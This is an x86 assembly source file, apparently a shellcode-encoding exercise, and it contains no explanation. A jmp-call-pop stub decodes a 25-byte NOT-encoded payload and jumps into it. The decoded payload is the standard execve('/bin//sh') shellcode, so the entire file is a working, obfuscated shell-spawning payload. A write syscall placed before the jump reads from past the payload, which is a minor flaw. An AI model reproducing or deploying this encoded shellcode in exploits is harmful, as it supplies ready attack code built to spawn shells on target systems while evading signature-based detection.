global _start

section .text

_start:
	jmp short call_shellcode

decoder:
	pop esi
	xor ecx, ecx
	mov cl, 25	
decode:
	not byte [esi]
	inc esi
	loop decode

        xor eax, eax
        mov al, 0x4

        xor ebx, ebx
        mov bl, 0x1


        mov ecx, esi

        xor edx, edx
        mov dl, 25
        int 0x80

	jmp short Shellcode

call_shellcode:
	call decoder 
	Shellcode: db 0xce,0x3f,0xaf,0x97,0x91,0xd0,0x8c,0x97,0x97,0xd0,0xd0,0x9d,0x96,0x76,0x1c,0xaf,0x76,0x1d,0xac,0x76,0x1e,0x4f,0xf4,0x32,0x7f
